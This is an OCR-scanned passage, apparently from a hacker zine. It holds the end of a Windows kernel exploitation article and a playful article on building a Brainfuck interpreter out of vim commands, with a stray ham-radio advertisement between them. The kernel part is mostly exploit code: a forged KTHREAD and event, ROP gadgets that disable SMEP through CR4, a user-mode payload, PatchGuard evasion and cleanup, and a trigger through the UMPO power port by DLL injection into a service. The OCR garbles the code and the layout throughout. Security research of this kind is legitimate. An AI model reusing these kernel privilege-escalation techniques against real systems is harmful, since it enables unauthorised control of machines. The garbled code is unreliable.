RESTORE_EXCEPTION_FRAME macro, which will take 
care of everything but RAX, RCX, and RDX for us. We 
can of course return anywhere else we'd like and 


build our own ROP chain. 


8.1.10 PoC 


Let’s look at the code that implements everything 
we’ve just seen. First, we need to hard-code our cur- 
rent user-mode thread to run only on the first CPU 
of Group 0 (always CPU 0). The reason for this will 
become obvious shortly: 


which is not available to user-mode. Therefore, by 
forcing our thread to run on Group 0 earlier, we can 
guarantee that the CPU Index 0 matches Processor 
0. 








deathThread. Affinity affinity; 
deathThread. IdealProcessor 0; 





Now we know this thread will run on the same 
processor we're on, but we want to guarantee it will 
pre-empt us. In other words, we need to bump up 
its priority higher than ours. We could pick any 
number higher than the current priority, but we'll 
pick 31 for two reasons. First, it's practically guar- 
anteed to pre-empt anything on this processor, and 
second, it's in the so-called real-time range which 
means it's not subject to priority adjustments and 
quantum tracking, which will make the scheduler's 
job easier when getting this thread in a runnable 
state (and avoid us having to define more state). 








death Thread. Priority 


31; 








affinity .Group = 0; 

affinity .Mask = 1; 

SetThreadGroupAffinity ( 
GetCurrentThread (), &affinity , NULL); 








Next, let us create an active wait any wait block, 
associated with an arbitrary thread: 








deathBlock. WaitType = WaitAny; 
deathBlock. Thread = &deathThread; 
deathBlock.BlockState = WaitBlockActive; 








Then we create a Synchronization Event, which 
is currently tied to this wait block: 








deathEvent. Header. Type = 
EventSynchronizationObject ; 
InitializeListHead( 
&deathEvent . Header. WaitListHead) ; 
InsertTailList ( 
&deathEvent . Header. WaitListHead , 
&deathBlock. WaitListEntry); 








All right! We now have our event and wait block. 
It’s tied to the death Thread, so let's go fill that out. 
First, we give this thread the correct hard affinity 
(i.e., the one we just set for ourselves) and soft affin- 
ity (i.e., the ideal processor). Note that the ideal 
processor is expressed as the raw processor index, 
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Okay, so if we're going to claim that our event 
object is being waited on by this thread, we bet- 
ter make the thread appear as if it's in a committed 
waiting state with one wait block—the one the event 
is associated with: 








deathThread 
deathThread 


.State = Waiting; 

. WaitRegister. State 
WaitCommitted ; 

. WaitBlockList = &deathBlock; 

. WaitBlockCount = 1; 


deathThread 
deathThread 





Excellent! For the context switch routine to work 
correctly, we also need to make it look like this 
thread is in the same process as the current thread. 
Otherwise, our address space will become invalid, 
and all sorts of other crashes will occur. In order 
to do this, we need to know the kernel pointer of 
the current process, or KPROCESS structure. Thank- 
fully, there exists a variety of documented informa- 
tion leaks in the kernel that will allow us to obtain 
this information. One common technique is to open 
a handle to our own process ID and then enumerate 
our own handle table until we find a match for the 
handle number. The Windows API will then con- 
tain the kernel address of the object associated with 
this handle (i.e., our very own process!). 











= 








deathThread. ApcState. Process addrProcess; 








Last, but not least, we need to set up the 
kernel stack, which should be pointing to a 
KSWITCH_FRAME. And we need to confirm that the 
stack truly is resident, as per our discoveries above. 
The switch frame has a return address, which we are 
free to set to any address we'd like to ROP into. 








deathThread. KernelStackResident = TRUE; 

deathThread. KernelStack = 
&deathStack.SwitchFrame; 

deathStack. SwitchFrame. Return = 
exploitGadget; 








Actually, let's not forget that we also need to 
have a valid FPU stack, so that the FPU/XSAVE 
restore can work when context switching. One easy 
to way to do this is as follows: 








. fxsave(deathFpuStack) ; 
death Thread.StateSaveArea = deathFpuStack; 








Once all the above operations are done, we have 
a fully exploitable event object, which will get us to 
"exploitGadget". But what should that be? 


8.2 ACT II. The Right Gadget and 
Cleanup 


8.2.4 ROPing to User-Mode 























User mode Kernel a 

stac : image CPU state 
OxFF...34c ——— pop rex PERE 9x 1486 
0x21480 — tret 
oxFF. . 1088 — 
xFE 45 : 

iP pev Cry rex cr4 - 0x21480 

0x10600-— — lret 

avlo: rip = 0x10000 
payload «e nnne cm (ring.9) 


User mode image 


Once we've established control over RIP/RSP, it/s 
time to actually extract some use out of this abil- 
ity. As we're not going to be injecting executable 
code in the kernel (especially hard on Windows 8.1, 
and even harder on Windows 10), the best place to 
direct RIP is in user mode. Sadly, modern mitiga- 
tions such as SMEP make this impossible, and any 
attempt to execute our user-mode code will result in 
a nasty crash. Fortunately, SMEP is a CPU feature 
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that must be enabled by software, and it relies on 
a particular flag in the CR4 to be set. All we need 
is the right ROP gadget to turn that flag off. As it 
happens, the function to flush the current TLB is 
inlined throughout the kernel, which results in the 
following assembly sequence when it's done at the 
end of a function: 








. text :00000001401B874C mov cr4, 
. text :00000001401B874F retn 


rcx 





Well, now all that we're missing is a gadget 
to load the right value into RCX. This isn't hard, 
and for example, the KeRemoveQueueDpcEx function 
(which is exported) has exactly what we need: 








.text:00000001400DB5B1 pop rcx 
.text:00000001400DB5B2 retn 





With these two simple gadgets, we can control 
and fill out the KEXCEPTION FRAME that's supposed 
to be right on top of the KSWITCH FRAME as follows: 








deathStack. SwitchFrame. Return 
popRcxRopGadget; // pop rez... 

deathStack.ExceptionFrame.P1Home = 
desiredCr4Value; // i.e.:, 0x506F8 

deathStack.ExceptionFrame.P2Home = 


cr4RopGadget ; // mov cr4, ret... 
deathStack.ExceptionFrame.P3Home = 
StagelPayload; // User RIP 





8.2.2 Consistency and Recovery 


Imagine yourself in StageiPayload now. Your 
KPRCB’s CurrentThread field points to a user- 
mode KTHREAD inside of your own personal address 
space. Your RSP (and your KTHREAD's RSP and 
TSS's RSPO) are also pointing to some user-mode 
buffer that's only valid inside your address space. 
All it takes is a another thread on another processor 
scouring the CPU queues (trying to find out who 
to pre-empt) and dereferencing the “death Thread", 
before a crash occurs. And let me tell you, that 
happens...a lot! Our first order of business should 
therefore be to allocate some sort of globally visi- 
ble kernel memory where we can store the KTHREAD 
we've built for ourselves. But the mere act of allo- 
cating memory will take a relatively long time, and 
chances are high we'll crash early. 











CPU O : CPUn 










Process A 
3 register 


timer 


; 2 Allocate 


pool memory 





1 copy thread 
Ox7FFEOFOO 


KUSER_SHARED_DATA 





4 erase thread 
OxFFFFF78000000F00 





KTHREAD[ |< 


So we'll take a page out of some very early NT 
rootkits. Taking advantage of the fact that the 
KUSER, SHARED. DATA structure has a fixed, global 
address on all Windows machines and is visible in 
all processes. It's got just enough slack space to fit 
our KTHREAD structure too! As soon as that's done, 
we want to update the KPRCB's Current Thread to 
point to this new copy. The code looks something 
like this: 








PKTHREAD newThread — 
SharedUserData+sizeof (*SharedUserData); 
_ movsq(newThread, &deathThread, 
sizeof (KTHREAD) / sizeof (ULONG64) ) ; 
|. writegsqword( 
FIELD OFFSET(KPRCB, CurrentThread), 
new' Thread) ; 








Although unlikely, a race condition is still pos- 
sible right before the copy completes. One could 
avoid this by creating a user-mode process that cre- 
ates priority 31 threads on all processors but the 
current one, spinning forever, until the exploit com- 
pletes. That will remove any occurrences of proces- 
sor queue scanning. 

At this point, we can now attack the kernel in 
any way we want, but once we're done, what hap- 
pens to this thread? We could attempt to terminate 
it with PsTerminateSystemThread, but a number of 
things are likely to go wrong—namely that we aren't 
a system thread (but we could fix that by setting 
the right KTHREAD flag). Even beyond that, how- 
ever, the API would attempt to access a number of 
additional KTHREAD and KPROCESS fields, dereference 
the thread object as an ETHREAD (which we haven't 
built), and require an amount of information leaks 
so great that it is unlikely to ever work. Entering 
a tight spin loop would fix these problems, but the 
CPU would be pegged down forever, and a single- 
core machine would simply lock up. 
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We've seen, however, that we have enough of a 
KTHREAD to exit the scheduler and even be context- 
switched in. Do we have enough to enter the sched- 
uler and be context-switched out? The simplest 
way to do so is to use the KeDelayExecutionThread 
API and pass in an absurdly large timeout value— 
guaranteeing our thread will be stuck in a wait state 
forever. 

Before doing so, however, we should remem- 
ber that all dispatching operations happen at 
DISPATCH LEVEL, as we saw earlier. And normally, 
the exit from SwapContext would've resulted in re- 
turning back to some function that had raised the 
IRQL, so that it could then lower it. We are not al- 
lowed to re-enter the scheduler at this IRQL, so we'll 
first lower it back down to PASSIVE, LEVEL ourselves. 
Our final cleanup code thus looks like this: 








... writecr8(PASSIVE LEVEL); 

timeout.QuadPart = 0x800000007FFFFFFF ; 

pKeDelayExecution Thread ( KernelMode , 
FALSE, &timeout); 





8.2.39 Enter PatchGuard 


Readers of this magazine ought to know that skape 
and skywing aren't idiots—their PatchGuard tech- 
nology embedded into the NT kernel will actually 
actively scan for changes to KUSER SHARED. DATA. 
Any modification such as our addition of a ran- 
dom KTHREAD in its tail will result in the famous 
109 BSOD, with a code of “0”, or “Generic Data 
Modifcation". 

Thus, we need to clear out our KTHREAD from 
there—but that poses a problem since we can't de- 
stroy the KTHREAD before we call KeDelayExecut- 
ionThread. One option is to allocate some non- 
paged pool memory and copy our KTHREAD structure 
in there, then modify the KPRCB Current Thread 
pointer yet again. But this means that we will be 
leaking a KTHREAD in memory forever. Can we do 
better? 

Another possibility is to do the destruction of the 
KTHREAD after the KeDelayExecutionThread has 
executed. Nobody will ever need to look at, or touch 
the structure, since we know it will never wake up 
again. But how can we run after the endless delay? 
Clearly, we need another activation point—and Win- 
dows offers timer-based deferred procedure routines 
(DPCs) as a solution. By allocating a nonpaged 
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pool buffer containing a KTIMER structure (initial- 
ized with KelnitializeTimer) and a KDPC structure 
(initialized with KelnitializeDpc), we can then use 
KeSetTimer to force the execution of the DPC to, 
say, 5 seconds later in time. This is easy to do as 
shown below: 








PSTAGE TWO DATA data; 
LARGE INTEGER timeout ; 
data = pExAllocatePool(NonPagedPool, 
sizeof(*data)); 
.. movsq(data—»Code, CleanDpc, 
sizeof(data—»Code) / sizeof (ULONG64) ) ; 
pKelInitializeDpc(&data—»Dpc, 
data—>Code, NULL); 
(&data—>Timer) ; 
timeout . QuadPart —50000000; 
pKeSetTimer(&data—»Timer, timeout, 
&data—>Dpc) ; 








Inside of the CleanDpc routine, we simply de- 
stroy the thread and free the data: 








PKTHREAD newThread — 
SharedUserData-4sizeof(*SharedUserData) ; 
data — CONTAINING RECORD( 
Dpc, STAGE TWO DATA, Dpc); 
_ Stosq(newThread, 0, 
sizeof (KIHREAD) / sizeof (ULONG64)); 
pExFreePool (data); 








With the KUSER. SHARED DATA structure cleaned 
up, we should never hear from PatchGuard again. 
And so, the system is now restored back to sanity— 
except for the case when a few seconds later, some 
thread, on some arbitrary processor, inserts a new 
timer in the tree of timers. The scheduler, after 
computing a 256-based hash bucket handle for the 
KTIMER entry, inserts it into the list of existing 
KTIMER structures that share the same hash—that, 
with a probability of 1/256, is the near-infinitely ex- 
piring timer that KeDelayExecutionThread is us- 
ing. Why is this a problem, you ask? 

Well, as it happens, the kernel doesn't want to 
have to create a timer object whenever a wait is 
done that involves a timeout. And so, any time 
that a synchronization object is waited upon for a 
fixed period of time, or any time that a Sleep/Ke- 
DelayExecutionThread call is performed, an inter- 
nal KTIMER structure that is preallocated in the 
KTHREAD structure is used, under the field name 
Timer. This also creates one of the NT kernel's 
best-designed features: the ability to wait on ob- 
jects without requiring a single memory allocation. 


70 


Unfortunately for us as attackers, this means 
that the timer table now contains a pointer to what 
is essentially computable as KUSER_SHARED_DATA + 
sizeof (KUSER_SHARED_DATA) + FIELD_OFFSET(- 
KTHREAD, Timer))... a data structure that we 
have completely zeroed out. That list of hash en- 
tries will therefore hit a NULL pointer (Windows 
lists are circular, not NULL- terminated) and crash. 
We must do one more thing in the CleanDpc routine 
then—remove this linkage, which we can do easily: 








RemoveEntryList ( 
&newThread—>Timer. TimerListEntry ) ; 





8.2.4 PatchGuard Redux 


Remember the part about Patchguard’s developers 
not being stupid? Well, they’re certainly not go- 
ing to let the corrupt, SMEP-disabled value of CR4 
stand! And so it is, that after a few minutes (or 
less), another 109 BSOD is likely to appear, this 
time with code 15 (“Critical processor register modi- 
fied”). Hence, this is one more thing that we’re going 
to have to clean up, and yet again something that 
we cannot do as part of our user-mode pre-KeDel - 
ayExecutionThread call, because the very next in- 
struction would then issue a SMEP violation. Good 
thing we’ve got our 5-second timer-based DPC! 

Except that things are never that easy, as readers 
probably know. One of the great (or terrible) things 
about DPCs is that they run in arbitrary thread con- 
text and don’t have a particular affinity to a given 
processor either, unless told otherwise. While in a 
normal interrupt service routine environment, the 
DPC will typically execute on the same processor it 
was queued on, this is not the case with timer-based 
DPCs. In fact, on most systems, these will execute 
on CPU 0 at all times, whereas on others, they can 
be distributed across processors based on utilization 
and power needs. Why is this a problem? Because 
we've disabled SMEP on one particular processor— 
the one that ran our first-stage user-mode payload, 
while the DPC can run on a completely different 
processor. 

As always, the NT kernel offers up an API as 
a solution. By using KeSetTargetProcessorDpcEx, 
we can make sure the DPC runs on the same pro- 
cessor as our first stage payload (which should be 
CPU 0, Group 0, but let’s do this in a more portable 


way): 





N 


iN 








PROCESSOR NUMBER procNumber ; 

pKeGet Current ProcessorNumberEx ( 
&procNumber) ; 

pKeSet Target ProcessorDpcEx ( 
&data—>Dpc, &procNumber) ; 








Success is now finally ours! By cleaning up 
the KUSER_SHARED_DATA structure, eliminating the 
KTHREAD’s timer from the timer list, and restoring 
CR4 back to its original value, the system is now 
fully restored in its original state, and we’ve even 
freed the KDPC and KTIMER structures. There’s now 
not a single trace of the thread left around, which 
pretty much amounts to the initial idea of terminat- 
ing the thread. From dust we made it, and to dust 
it returned. 

Of course, our payload hasn’t actually done any- 
thing, other than clean up after itself. Obviously, 
at this point, any number of actually real system 
threads could be created, periodic timer DPCs could 
be queued, work items can be queued, and all other 
arbitrary kernel-mode operations are permitted, de- 
pending on the ultimate goals of our exploit. 





8.3 ACT III. Denoument 
8.3.1 The Trigger 


We have so far been operating in an imaginary world 
where we can send the kernel an arbitrary Event 
Object as a KEVENT and have the kernel attempt to 
signal it. We now have shown that this scenario can 
reliably lead to kernel execution. The next question 
is, how can we trigger it? 

As it happens, the kernel has a function called 
PopUmpoProcessPowerMessage, which responds to 
any message that is sent to the ALPC port that 
it creates, called PowerPort. Such messages have 
a simple 4-byte header indicating their type, and a 
type of 7, which we'll call PowerMessageNotifyLe- 
gacyEvent, and is treated as follows: 








eventObject = 
Power Message—>NotifyLegacyEvent. Event; 
if (event Object ) 


KeSetEvent (eventObject, 0, 0); 








To send messages to this port, a complex se- 
ries of actions and ALPC-specific setup, plus some- 
how getting access to this port, must be performed. 
Thankfully, we don’t need to do any of it, as the 
UMPO.DLL library, which implements the User Mode 
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Power Manager, exports a handy UmpoAlpcSend- 
PowerMessage function. By simply injecting a DLL 
into the service, which contains all of the above code 
implementation, we can execute the following se- 
quence to trigger a Ring 3 to Ring 0 jump: 








power Message. Type 
Power MessageNotifyLegacyEvent ; 

power Message. NotifyLegacyEvent. Event 
&deathEvent ; 

UmpoAlpcSend Power Message ( 
&powerMessage, sizeof(powerMessage) ) ; 





8.4 Conclusion 


As we've seen in this analysis, sometimes even the 
most apparently non-exploitable data corruption/- 
type confusion bugs can sometimes be busted open 
with sufficient understanding of the underlying op- 
erating system and rules around the particular data. 
The author is aware of another vulnerability that re- 
sults in control of a lock object—which, when fixed, 
was assumed to be nothing more than a DoS. The 
author posits that such a lock object could’ve also 
been maliciously constructed to appear in an non- 
acquired state, which would then cause the kernel to 
make the thread acquire the lock—meanwhile, with 
a race condition, the lock could’ve been made to ap- 
pear contended, such as to cause the release path to 
signal the contention even, and ultimately lead to 
the same exploitation path as discussed here. 

It is also important to note that such data cor- 
ruption vulnerabilities, which can lead to stack piv- 
oting and ROP into user mode will bypass technolo- 
gies such as Device Guard, even if configured with 
HyperVisor Code Integrity (HVCI)—due to the fact 
that all pages executing here will be marked as exe- 
cutable. All that is needed is the ability to redirect 
execution to the UMPO function, which could be 
done if User-Mode UMCI is disabled, or if Power- 
Shell is enabled without script protection—one can 
reflectively inject and redirect execution of the Sv- 
chost.exe process. Note, however, that enabling 
HVCI will activate HyperGuard, which protects the 
CR4 register and prevents turning off SMEP. This 
must be bypassed by a more complex exploit tech- 
nique either affecting the PTEs or making the kernel 
payload itself be full ROP. 

Finally, Windows Redstone 14352 and later fix 
this issue, just in time for the publication of the ar- 
ticle. This bug will not be back-ported as it does 
not meet the bulletin bar, howevern 





9 A VIM Execution Engine 


The power of vim is known far and wide, yet it is 
only when we push the venerable editor to its limits 
that we truly see its beauty. To conclusively demon- 
strate vim's majesty, and silence heretical doubters, 
let us construct a copy /paste/search/replace Turing 
machine, using vanilla vim commands. 

First, we lay some ground rules. Naturally, we 
could build a Turing machine using the built-in vim- 
script, but it is already known that vimscript is 
Turing-complete, and this is hardly sporting. vim 
ex commands (the requests we make from vim when 
we type a colon) are abundant and powerful, but 
these too would make the task simple, and therefore 
would fail to illustrate the glory of vim. Instead, we 
strive to limit ourselves to normal vim commands - 
yank, put, delete, search, and the like. 

With these constraints in mind, we must decide 
on the design of our machine. For simplicity, let 
us implement an interpreter for the widely known 
BrainFuck (BF) programming language. Our ma- 
chine will be a simple text file that, when opened 
in vim and started with a few key presses, inter- 
prets BF code through copy /paste/search /replace 
style vim commands. 

Let us begin by giving our machine some mem- 
ory. We create data tape in the text file by simply 
adding the following: 








t: 
0000000000 








We now have ten data cells, which we can locate 
by searching for t. 

Now what of the BF code itself? Let us add a 
Fibonacci number generator to the file: 








-p: 
>++++++++++>+>+ [[+++++ [>D++++++++ 
<-] >. <++++++[>-------- <-]+<<<]>. 
>>[[-1<[>+<-]>>[<<+>+>-]<[>+<-[> 
+<- [>+<-[>+<-[>+<-[>+<-[>+<-[>+< 
-[»-«-[»[-]»-»-««««-[»-«-11111111 
J]]+>>>] <<<] 








72 


by Chris Domas 


Progress! Now we add lines to accommodate in- 
put and output, although these will be left empty 
for now: 





i: 


o: 





To perform output, our program will need to 
convert the numeric memory cells to ASCII values. 
This can easily be done by adding an ASCII lookup 
table to our program: 








a: 


6 A 66B 67 C 68D ... 








The arrangement of underscores and spaces will 
assist us in navigating the table with vim com- 
mands. Providing an “unknown” uuu allows us to 
process values outside the ASCII range. 

Now for the fun part—how do we execute our 
BF program using just our simple vim commands? 
We would envision a small set of commands running 
continuously to interpret the program. Of course, 
we could manually type out these commands our- 
selves, over and over, to perform the execution (and 
we indeed encourage this as an enjoyable exercise!), 
but in the unfortunate situation in which an inter- 
preted program fails to halt, we may come to find 
this process laborious. Instead, we will insert the 
keys for these commands directly into our vim file. 
When complete, we can automatically run the com- 
mands on the first line of the file by typing: 








ggyyQ" 





If the first line, in turn, moves to other lines, 
and repeats this process of yanking a line of com- 
mands (yy) and executing the yanked buffer (0"), 
execution can continue indefinitely, without any ad- 
ditional user action. 


PSs A A A A eee A im mas 


j mechanical forms of ATV and introduces radio amateurs to TV at an inexpensive level based on 

+ home-brew construction, NBTV should not be confused with SSTV which produces still pictures 
! at a much higher definition. As TV base bandwidth is only about 7kHz, recording of signals on 

| audiocassette is easily achieved. A quarterly 12-page newsletter is produced and an annual 

+ exhibition is held in April/May in the East Midlands. If you would like to join, send a crossed 

+ cheque/postal order for £4 (or £3 plus a recent SPRAT wrapper) to Dave Gentle, G4RVL. | Sunny ! 
| Hill, Milford, Derbys, DES6 OQR, payable to “NBTVA”. I 
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So to begin, let us simplify the process of navi- 
gating the text file by setting marks at key points. 
At the start of our text file, we add commands to 
set a mark at the beginning of the file: 








gg0mh 








A mark at the memory tape: 








/ t^Mnjmt'h 








A mark at the BF code: 








/ p^Mnjmp'h 








A mark at the input, output, and ASCII table: 








/ o^Mnjmo'h/ i^Mnjmi'h/ a^Mnjma'h 








Although these steps are not strictly necessary, 
they will simplify navigating the file for future com- 
mands. 

Now for execution! BF contains 8 instructions: 
increment the current data cell (+), decrement the 
current data cell (-), move to the next data cell (>), 
move to the previous data cell (X), a conditional 
jump forward ([), a conditional jump backward (1), 
output the current data cell (.), and input to the 
current data cell (,). Let us construct a table of 
vim commands to carry out each of these opera- 
tions; each label will act as a marker for looking up 
the corresponding commands: 








Es 
"> —227K 
ZIX 
—[-2??X 
]-???X 

+-2???7X 

——?TMX 
.—?T?X 
= 222K 
fi 222K 
b: ???X 








We again apply the trick of special charac- 
ters around each operation to simplify the search 
process—we may find many >’s in our file, but there 
will be only one _>-. We mark the end of the com- 
mand with an X. We preemptively supply additional 
_f and _b commands, to carry out the conditional 
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part of the BF branch operations [ and ]. We will 
determine the exact commands for each momentar- 
ily, which will replace the unknown ??? above. For 
now, let us continue the previous process of adding 
marks to each for quick navigation. 








/ c^Mnjma'h/ c^Mnf mf'h/ b^Mnf mb 








Now that our marks are set, we add to the top of 
our file the commands to execute the first instruc- 
tion in the BF program: 








'pylíc/ NV^R"^Mf-1y2tX Q " 





This will move to the BF program (^p), yank one 
BF instruction (yl), move to the command table ('c), 
find the BF instruction in the table, (/ NV^R"^M) 
move to the list of commands for that instruction 
(1), yank the list of commands (y2tX)—skipping 
an X embedded in the command, and seeking for- 
ward to the terminating X—and execute the yanked 
commands (@"). With this, our execution begins! 

Let's now complete our table by determining the 
commands to execute each BF instruction. > and < 
are particularly simple. For >: 








'twmt'p mpyl'c/ NV^R"^Mf-1y2tXQ" 





Plainly, this is: move to the memory tape (‘t), 
move forward one memory cell (w), mark the new 
location in the tape (mt), move back to the BF pro- 
gram (‘p), move forward one character to progress 
over the now executed BF instruction ( ), mark the 
new location in the BF program (mp), yank the next 
BF instruction (yl), and follow the previous process 
(*c/. N^R"^Mf -1y2tXQ") to locate that instruction 
in the command table, yank its commands, and ex- 
ecute them. 

€, then, is similarly implemented as: 








“tbmt'p mpyl'c/ NV^R"^Mf-1y2tXQ" 





What of + and -? + can be performed with: 








't^A'p mpyl'c/ NV^R"^Mf-1y2tXQ" 




















This is virtually identical to the < and > imple- 
mentation. This time, we move to the current data 
cell and increment it with ^ A. Strictly speaking, this 
is a violation of the copy/paste/search/replace type 
execution we have been using. However, with mini- 
mal effort, the increment could be performed via a 
lookup table (as we do for the ASCII conversion) — 
we simply elide this for brevity. 

Simply replacing ^ A (increment) with ^ X 
(decrement), - is derived: 








't^X'p mpyl'e/ NV^R"^Mf-1y2tX Q" 








Now, certainly, our interpreter is not useful with- 
out input and output, so let us add . and , com- 
mands. . may be 








‘tyw‘a/_\(7R"\|uuu\)*Mellyl ‘op$mo‘p mpyl'c/ 
W^R'"^Mf-Iy2tX Q " 








This of course is: move to the memory tape 
(‘t), yank a cell (yw), move to the ASCII table (‘a), 
search for the yanked cell or, if it is not found, move 
to the uuu marker, (/ NCCR"N|uuuV) ^M), move over 
the marker characters (ell), yank the corresponding 
ASCII character (yl), move to the output (‘o), paste 
the ASCII character (p), move to the end of the out- 
put ($), mark the new output location (mo), and 
finally, move back to the BF program, move over 
the executed instruction, grab the next instruction, 
locate its commands, and execute them, as before. 








(‘p mpyl‘c/_\V*R"*Mf-ly2tX@") 








Data input with , is similarly: 








“iy mi‘a/ ^R" “MT ye'txt p‘p mpyl‘c/_\WR"* 
Mf-ly2tX@" 








Which simply performs the reverse lookup and 
stores the result in the current memory cell. 

We are close, but, alas!, nothing is ever simple, 
and BF’s conditional looping becomes more com- 
plicated. The BF [ instruction means precisely “if 
the byte at the data pointer is zero, then instead of 
moving the instruction pointer forward to the next 
command, jump it forward to the command after the 
matching ] command.” 
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‘tyt !É/V(^R" Vn N)x^Mf-Iy2tXQ " 





Meaning, navigate to the memory tape (‘t), yank 
a memory cell (yt ), navigate to the forward as- 
sist commands ('f), search for either the yanked 
cell, or, if it is not found, the character n, fol- 
lowed by x (/\(7R"\|n\)x7M), and yank and ex- 
ecute the given commands, using the process as be- 
fore (f-1y2tX0"). This search allows us to achieve 
the conditional portion of the [ instruction—we will 
include a marker for only *0", so only a memory cell 
of “0” will find a match—all others will be directed to 
the “n” character. Our forward assist then appears 
as: 








f: 0x:—*p% mpyl'c/ NWV^R"^Mf-ly2tXQ"X nx:—'p 
mpyl'c/ NV^R"^Mf-1y2tXQ "X 





If the memory cell is 0, the previous search 
matches Ox, and the commands following it are 
yanked and executed. If the memory cell is not 
0, the previous search matches nx, and the com- 
mands following it instead are yanked and exe- 
cuted. For 0, we have: go to the BF program 
(*p), navigate to the corresponding ] instruction 
(96), move to the instruction after this ( ), mark 
the new location in the program (mp), and then 
yank and execute the next instruction, as before. 
(yl'c/ NV^R"^Mf-1y2tXQ") For non-0, we have: go 
to the BF program (‘p), navigate to the next instruc- 
tion ( ), mark the new location in the program (mp), 
and then yank and execute the next instruction, as 
before. (ylíc/ NV^R"^Mf-1y2tXQ") 

] is now straightforward. Following the same 
patterns, we have: 








‘tyt ‘b/\(7R"\|n\)x*Mf&-ly2tX@" 





for the conditional search, and 








b: 0x:—'p mpyl‘c/_\V°R"*Mf-ly2tX@"X_nx:— ‘p% 
mpyl‘c/_\V°R"*Mf-ly2tX@"X 





as the backward assist commands. An ardent 
observer may argue the the vim % command vi- 
olates our copy/paste/search/replace design, and, 
alas!, this is so. However, we argue that a series 
of searches, increments, and decrements—like those 




















1968 /NT A/NZ "NKCC-A2" / g|% s /\"X/\="\<C-X>"/g|%s /N R/A="X<C-R>"/81%s/17M/Wn/8/106 


Of-ly$@" 
HH launch with gg2yyQ" #444 
HHHH @xoreaxeaxeax HH 
c:  sl—-ggÜmh'h/ t^Mnjmt'h/ p^Mnjmp'h/ o^Mnjmo'h/ i^Mnjmi'h/ s2^Mnf-ly$Q"njmt j 


s2—‘h/ a^Mnjma'h/ c^Mnmnf:mc'h/ f^Mnf mf'h/ b^Mnf mb'pyl'c/ WXV^R"^Mf-1y2tX à " 
^z »—'twmt'p mpyl'c/ XV^R"^MÍ-ly2tX Q"Xs -—'tbmt'p mpyl'c/ WVV^R"^Mf-1y2tX à "X 
O0x:—'p96 mpyl'c/ NXV^R"^Mf-l1y2tX OQ "Xa nx:—'p mpyl'c/ \V*R"*Mf-ly2tX@"Xmpyl 
Ox:—'p mpyl'c/ NXV^R"^Mf-1y2tXQ "Xm nx: —‘p% mpyl'c/ NVR""Mf-ly2tXQ"Xly2t 


N 






-L—'t^A'p mpyl'c/ WXV^R"^Mf-1ly2tX Qà"Xo ——'t^X'p mpyl'c/ NXV^R"^Mf-l1y2tXQ "X /—— 
(]-'tyt ‘b/\(7R"\[n\)x*Mf-ly2tX@"XxXd_[—‘tyt '£/X(^R"V[nV)x^Mf-1y2t XQ "X^ $0x:— 
(v.$7yy .—'tyw'a/ WX(^R"X[uuuX)^Mellyl ‘op$mo‘p mpyl'c/ NVV^R"^Mf-1y2tXQ" Xelly 
_$‘p mpy'pyl'a ,—'iy  mi'a/ ^R" ^MT ye'tvt p‘p mpyl'c/ XV^R"^MfÍ-ly2tXQ"X 4— 
o: 
i: 
100^M 
bt 
0000000000000000000000000000000000000000000000000 
0000000000000000000000000000000000000000000000000 
0000000000000000000000000000000000000000000000000 
0000000000000000000000000000000000000000000000000 
a: 
t ie Ora i. Dy i 3. 4. 5 s 6. T 8. 9. 10^M 11. 12. 13 i4 . A 
AO og 18 2 19 5 20.4. 21 . . 22 &. . 29 4. 4 &.. 25 5- 26 »... 2T 4 .28 « 29 .. 90 s. SL 
32 233 ! 34 " 35 4 368 37% 38 & 39 * 40 ( 41) 42 * 43 + 44 , 45 — 46 . 47 /_ 
| 480 4901 502 513 524 535 546 557 568 579 58: 59; 60< 6 — 62> 63 ? 
| 64 @ 605 A 66 B_ 67 C_ 68D 69E T7TOF NG 72H 731 74J 75 K 76L 77M 78N 790 
80P 81Q 82R 83S 84 T 85U 86 V 87 W 88X 89Y 90Z2 91 [__921_ 93] 94^ 95 __ 
— 96 * 97a 98 b 99 c 100 d 101 e 102 f 103 g 104 h 105 i 106 j 107 k 108 1 109 m 110 n 111 0. 
| 112 p 113 q 114 r 115 s 116 t 117 u 118 v 119 w 120 x 121 y 122 z 123 ( 124 | 125 ) 126 7 127 . 
_ uuu a o o = o o o o o o o o o 
LP: 
H->—>————————— Kg E E > > << >< >>> > A A A A <<< b+ 


>+<<—]>>[<<+>>—]<[<<+>>—]>>—]<<<[-]<<[>+<—]<]>>[<<+>>—]<<>+<—[>+[>+>+<<—]>>[<<4+>>—]<>+<——>>>>>>> 
D+<<<<<<<<[>+<—<[>>>4+>4<<<<—]>>>>[<<<<4+>>>>—]<<<>[>>+>4+<<<—]>>>|[<<<+>>>—]<<<<>>>[>+>+<<—]>>[<<+>> 


—]<<<[>>>>>+<<<[>+>4<<—]>>[<<+>>-—]<[>>[-|<<—]>>[<<<<[>+>4+<<—]>>|[<<+>>—]<>>>—]<<<—<<—]4 
]<<>[=]<[>>>>>>[=]<<<<<<-=]<<>>[=]>[21<<<]>>>>>>>>[=<<<<<<<[-=]<<[>>+>+<<<-=]>>>[<<<+>>>= 


t>>[<<[-]>>- 
<<<>>[>4+<- 





PIb+>+<<—-|>>[k<4>>-]<>4+4+4+4+4+44+4++<>>+<<[b+>[-]<<-]Sl<t+>-l<<ttt-4t4-4444+-45>-]<<-<-]44+44+4+44+44>[<-> 
—|<b+<-—I|<b+<-—|<b+<—]>>>|x<<+>>>—]<>+++ +++ +++ <[D>>+<<[>+>[-|<<—]>[<+>—]>[<x<++++ +++ ++ +>>>+<—]<<— 
<-]>>>>[K<<<+>>>>-]<<<<>[-]<<+>]<[[>+<-]+++++++K+++++++>-]<-><.[-]>>[K<+>>-]<<-]>++++K++++++++> 





—]<.[-]>>>>>>>)]<<<<<<<<>[-]<[-]<<-]+++44++4+4++.[-]# 





Figure 20 — VIM Execution Engine 


we have already shown - could be used to implement 
%'s functionality in a more perfect manner; we leave 
this as an exercise for the purists. 

But lo! With the implementation of the 8 BF 
instructions, our execution engine is complete! Fig- 
ure 20 shows a cleanly formatted version of the 
final machine. The demonstration machine uses 
our copy/paste/search/replace commands to calcu- 
late the prime numbers up to 100. For ease of 
use, we add an introductory %s search and replace 0 
sequence—momentarily allowing ourselves to enter 
ex commands—in order to insert the control char- 
acters (^ M, ^ R, etc.) needed throughout the rest 
of the machine. This provides us a pure-ASCII file, 
without the need to enter special characters. Simply 
copy the below, paste into vanilla vim, launch with 
gg2yy0", and witness the awesome Turing-complete 
power of our benevolent editor!** 








54unzip pocorgtfo12.pdf vimmmex.tar.gz 


git clone https://github.com/xoreaxeaxeax/vimmmex 
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10 Doing Right by Neighbor O'Hara 


